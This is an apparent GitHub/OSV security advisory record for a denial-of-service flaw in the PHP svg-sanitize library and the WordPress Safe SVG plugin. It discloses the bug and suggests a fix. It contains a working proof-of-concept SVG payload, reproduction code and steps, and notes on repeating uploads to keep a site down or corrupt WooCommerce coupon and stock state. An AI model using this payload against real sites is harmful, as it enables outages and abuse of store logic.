{"schema_version":"1.9.0","id":"GHSA-v383-3rw5-q8rf","published":"2026-10-08T19:41:05Z","modified":"2026-10-08T20:00:06.561710993Z","aliases":["CVE-2026-107379"],"summary":"enshrined/svg-sanitize: Denial of Service via DTD Attribute Declaration Crash","details":"## Summary\n\nA crafted SVG file (1009 bytes) crashes the PHP process when sanitized by `enshrined/svg-sanitize` (any version through 0.22.x). The sanitizer's `cleanAttributesOnWhitelist()` method calls `DOMElement::removeAttribute()` twice on the same attribute name — first removing the explicit attribute, then attempting to remove the DTD `#FIXED` default — triggering a PHP ext/dom type confusion that kills the PHP-FPM worker.\n\n**Affected installations:**\n- **enshrined/svg-sanitize:** 45.2M Packagist downloads, 1.3M/month, 90+ dependents\n- **WordPress Safe SVG plugin:** 1M+ active installs\n- **TYPO3:** svg-sanitize integrated into core since v9\n- **Drupal:** community module wrapping svg-sanitize\n\n## Vulnerability Details\n\n### Trigger Flow\n\n```\nSanitizer::sanitize($malicious_svg)\n  → DOMDocument::loadXML() — parses DTD, creates XML_ATTRIBUTE_DECL for #FIXED attr\n  → startClean() → cleanAttributesOnWhitelist($svgElement)\n    → \"badhref\" NOT in allowedAttrs\n    → removeAttribute(\"badhref\")          ← removes explicit attribute (safe)\n    → stripos(\"badhref\", \"href\") = TRUE\n    → getAttribute(\"badhref\")             ← returns DTD #FIXED default value\n    → isHrefSafeValue(\"javascript:x\")    ← returns FALSE\n    → removeAttribute(\"badhref\")          ← hits XML_ATTRIBUTE_DECL → CRASH\n```\n\n**Root cause in svg-sanitize:** The sanitizer does not strip DOCTYPE/DTD declarations before processing. The `cleanAttributesOnWhitelist()` method at `Sanitizer.php:303-330` has a double-removal pattern where the whitelist check and the href safety check can both call `removeAttribute()` on the same attribute name. When a DTD `#FIXED` default exists, the second call targets the DTD declaration node, triggering a PHP crash.\n\n**Second trigger path** in `cleanHrefAttributes()` (`Sanitizer.php:354`): case-normalization of `HrEf` → `href` calls `removeAttribute()` then `setAttribute()` on the DTD default.\n\n### WordPress Code Path\n\n```\nUser uploads SVG → WordPress wp_handle_upload()\n  → filter 'wp_handle_upload_prefilter'\n  → SafeSvg\\safe_svg::check_for_svg()        [safe-svg.php:176]\n  → SafeSvg\\safe_svg::sanitize($tmp_file)     [safe-svg.php:218]\n  → enshrined\\Sanitizer::sanitize($contents)   [Sanitizer.php:193]\n  → cleanAttributesOnWhitelist() → double removeAttribute → CRASH\n  → PHP-FPM worker killed (SIGABRT) → nginx returns HTTP 502\n```\n\n## Proof of Concept\n\n### Malicious SVG (evil.svg)\n\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE svg [\n  <!ATTLIST svg badhref CDATA #FIXED \"javascript:alert(1)\">\n]>\n<svg xmlns=\"http://www.w3.org/2000/svg\" badhref=\"javascript:alert(1)\" viewBox=\"0 0 100 100\">\n  <rect width=\"100\" height=\"100\" fill=\"red\"/>\n</svg>\n```\n\n### Standalone reproduction\n\n```php\n<?php\nrequire_once 'vendor/autoload.php';\n\n$svg = file_get_contents('evil.svg');\n$sanitizer = new \\enshrined\\svgSanitize\\Sanitizer();\n$clean = $sanitizer->sanitize($svg);\necho \"Sanitized: \" . strlen($clean) . \" bytes\\n\";\n// Process crashes at exit: munmap_chunk(): invalid pointer, exit code 134\n```\n\n### WordPress reproduction\n\n1. WordPress (any version) + Safe SVG plugin (any version through 2.4.0)\n2. Login as Author → Media → Add New → upload `evil.svg`\n3. **Result:** HTTP 502 Bad Gateway, PHP-FPM worker killed\n\n### Confirmed output\n\n```\n$ docker exec wordpress php /tmp/test.php\nSanitized: 157 bytes\nmunmap_chunk(): invalid pointer\n$ echo $?\n134\n\nPHP-FPM log:\n[WARNING] [pool www] child 17 exited on signal 6 (SIGABRT)\n```\n\n## Impact\n\n### Full Site Denial of Service\n\nWith `pm.max_children = N`: N concurrent SVG uploads = all PHP-FPM workers dead = complete outage. Workers respawn, but each malicious request kills one. Automated loop sustains permanent DoS.\n\n### Application State Corruption\n\nSIGABRT bypasses `register_shutdown_function()`. On WordPress + WooCommerce:\n- **Coupon bypass:** usage_count increment skipped → unlimited reuse of single-use coupons\n- **Stock oversell:** stock reduction not committed → multiple orders for 1-stock items\n- **Cron starvation:** wp_cron blocked → scheduled cleanup (unpaid order cancellation) never runs → stock held indefinitely\n\n### Attack surface\n\nSafe SVG hooks `wp_handle_upload_prefilter` (safe-svg.php line 152). The hook fires when code calls `wp_handle_upload()` or `wp_handle_sideload()`.\n\n**Note:** Popular form plugins (Contact Form 7, WPForms) use `move_uploaded_file()` directly, bypassing WordPress's upload pipeline. They do NOT trigger Safe SVG. Only code that explicitly calls `wp_handle_upload()` is affected.\n\n| Scenario | Authentication | Affected installs |\n|---|---|---|\n| WordPress (default Safe SVG) — Media upload | Author role (`upload_files` cap) | 1M+ |\n| WordPress — REST API `POST /wp/v2/media` | Author role | 1M+ |\n| WordPress — plugins using `wp_handle_upload()` for public uploads | Varies by plugin | Plugin-dependent |\n| Custom PHP app with svg-sanitize on public endpoint | **Often none** | 45M+ downloads |\n| TYPO3 (svg-sanitize in core since v9) | Backend editor | All TYPO3 v9+ |\n\nThe strongest pre-auth scenario is **custom PHP applications** using svg-sanitize directly on public upload endpoints — a common pattern given 45M+ Packagist downloads and 90+ dependent packages.\n\n## CVSS\n\n**CVSS 3.1: 6.5 (Medium)** — default WordPress (Author role)\n\n`AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H`\n\nFor custom apps with unauthenticated svg-sanitize endpoints: **CVSS 7.5 (High)** (PR:N)\n\n## Suggested Fix\n\nStrip DOCTYPE before parsing — eliminates the trigger regardless of PHP version:\n\n```php\n// In Sanitizer::sanitize(), before loadXML():\n$dirty = preg_replace('/<!DOCTYPE[^>]*(?:\\[.*?\\])?\\s*>/si', '', $dirty);\n```\n\n## Environment\n\n- enshrined/svg-sanitize 0.22.x (bundled with Safe SVG 2.4.0)\n- WordPress 6.9.4 + Safe SVG 2.4.0\n- PHP 8.3.24 (fpm), NTS, x86_64\n- nginx + PHP-FPM (Docker)\n\n**Reported by ExPatch Security Research — [expatch.llc](https://expatch.llc/)\nDenis Rostilov**","affected":[{"package":{"name":"enshrined/svg-sanitize","ecosystem":"Packagist","purl":"pkg:composer/enshrined/svg-sanitize"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.0.0"}]}],"versions":["0.1.0","0.1.1","0.1.2","0.1.3","0.1.4","0.1.5","0.1.6","0.10.0","0.11.0","0.12.0","0.13.0","0.13.1","0.13.2","0.13.3","0.14.0","0.14.1","0.15.0","0.15.1","0.15.2","0.15.3","0.15.4","0.16.0","0.17.0","0.18.0","0.19.0","0.2.0","0.2.1","0.20.0","0.21.0","0.22.0","0.3.0","0.4.0","0.4.1","0.5.0","0.5.1","0.5.2","0.5.3","0.5.3.1","0.6.0","0.7.0","0.7.1","0.7.2","0.8.0","0.8.1","0.8.2","0.9.0","0.9.1","0.9.2"],"database_specific":{"last_known_affected_version_range":"<= 0.22.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-v383-3rw5-q8rf/GHSA-v383-3rw5-q8rf.json"}}],"references":[{"type":"WEB","url":"https://github.com/darylldoyle/svg-sanitizer/security/advisories/GHSA-v383-3rw5-q8rf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-107379"},{"type":"WEB","url":"https://github.com/darylldoyle/svg-sanitizer/commit/23877db7e76f1e1df5c3e65ab30239219c3d2867"},{"type":"PACKAGE","url":"https://github.com/darylldoyle/svg-sanitizer"},{"type":"WEB","url":"https://github.com/darylldoyle/svg-sanitizer/releases/tag/1.0.0"}],"database_specific":{"cwe_ids":["CWE-770"],"github_reviewed":true,"github_reviewed_at":"2026-10-08T19:41:05Z","nvd_published_at":"2026-10-08T18:17:23Z","severity":"MODERATE"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}]}